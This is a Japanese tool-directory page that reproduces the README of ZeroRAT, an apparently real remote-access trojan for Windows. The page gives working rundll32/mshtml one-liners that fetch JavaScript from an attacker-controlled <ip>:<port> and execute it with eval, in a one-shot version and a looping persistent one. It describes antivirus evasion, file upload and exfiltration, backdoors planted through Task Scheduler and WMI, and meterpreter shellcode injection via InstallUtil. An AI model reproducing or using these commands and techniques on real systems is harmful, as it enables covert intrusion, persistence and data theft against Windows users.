Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ZeroRAT — ZeroRATはWindows上で動作するワンライナー遠隔操作ツールです。 | Kitploit
ツール/GitHubGitHub/5alt/zerorat
特権昇格ペイロード生成永続化メカニズムエクスプロイト横移動シェルコードデータ流出ポストエクスプロイトコマンド&コントロールリモートアクセスツールシェルコード生成リモートアクセストロイの木馬
633210年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub5alt/zerorat

ZeroRAT

ZeroRATはWindows上で動作するワンライナー遠隔操作ツールです。

リポジトリを見る

ZeroRAT

概要

Windows用の遠隔制御ツールです。クライアントは1つのコマンドを実行するだけで、Windowsのネイティブプログラムを使用し、ディスクにファイルを書き込みません。自然に免殺(アンチウイルス検知回避)の特性を持っています。再起動すると無効になります。

プログラム内のdownloadとuploadは、すべてクライアントの視点です。クライアントがサーバーからファイルをダウンロードすることをdownload、クライアントがサーバーにファイルをアップロードすることをuploadと呼びます。

設定

config.pyでクライアントの接続先アドレスと管理パスワードを変更します。debugをオフにすることを忘れずに確認してください。

プログラムはflaskとsqlite3に依存しています。pipでインストールしてください。

クライアント

<ip>:<port>を実際の接続先に置き換えてください。

通常版

root@kitploit:~
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}

永続版

root@kitploit:~
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}

サーバー

管理画面: http://<ip>:<port>/server/

サーバーがサポートするコマンドは以下の通りです

  • sessions アクティブなクライアントを一覧表示
  • use <id> IDでクライアントを選択
  • set <key> <value> グローバル変数を設定
  • show globals/downloads/uploads グローバル変数、クライアントがダウンロード可能なファイル、クライアントがアップロードしたファイルを表示
  • delete session 現在のクライアントを削除
  • delete download/upload <id> IDでファイルを削除
  • upfile ファイルをサーバーにアップロードし、downloadsリストに追加
  • download download_fileとdownload_save_pathの2つの変数を設定すると、クライアントがファイルをダウンロードし、download_save_pathに保存します
  • upload upload_file変数を設定すると、クライアントがupload_fileのファイルをサーバーにアップロードします
  • backdoor tasks <time> Windowsタスクスケジューラを利用してバックドアを仕込みます。時間形式は00:00
  • backdoor wmi WMIを利用してバックドアを仕込みます。1時間ごとに実行
  • meterpreter shellcode InstallUtilを使用してshellcodeでmeterpreterを埋め込みます。事前にLHOSTとLPORTを設定する必要があります(migrate後でないとコマンドを受け付けません。.NET Framework 2.0が必要)

上記のコマンド以外は、すべてWindowsシステムコマンドとして実行されます。

コマンドの詳細は/static/js/xkcd_cli.jsを参照してください。

開発

管理画面コマンドはクライアント側で管理 /static/js/xkcd_cli.js

管理画面コマンドはサーバー側で管理 /controllers/server.py

クライアント側の管理 /controllers/client.py

クライアントペイロード生成 payload.py

データベース操作関連 /models/

連絡先

http://5alt.me

md5_salt [AT] qq.com

参考資料

https://gist.github.com/subTee/f1603fa5c15d5f8825c0

http://drops.wooyun.org/tips/11764

http://drops.wooyun.org/tips/8290

http://drops.wooyun.org/tips/12354

https://github.com/chromakode/xkcdfools

http://www.kammerl.de/ascii/AsciiSignature.php

https://github.com/AlessandroZ/LaZagne

免責事項

本ツールを使用する際は、現地の法律を遵守し、学術テスト目的のみに使用してください。他人のコンピュータを不正に制御することは固く禁じられています。損害が発生した場合、作者は一切の責任を負いません。

License

GPLV3

TODO

  • コマンドの改善
  • 通信トラフィックの暗号化
ツールをダウンロード
  • meterpreter powershell PowerShell方式でmeterpreterを埋め込みます(PowerShell 1.0が必要)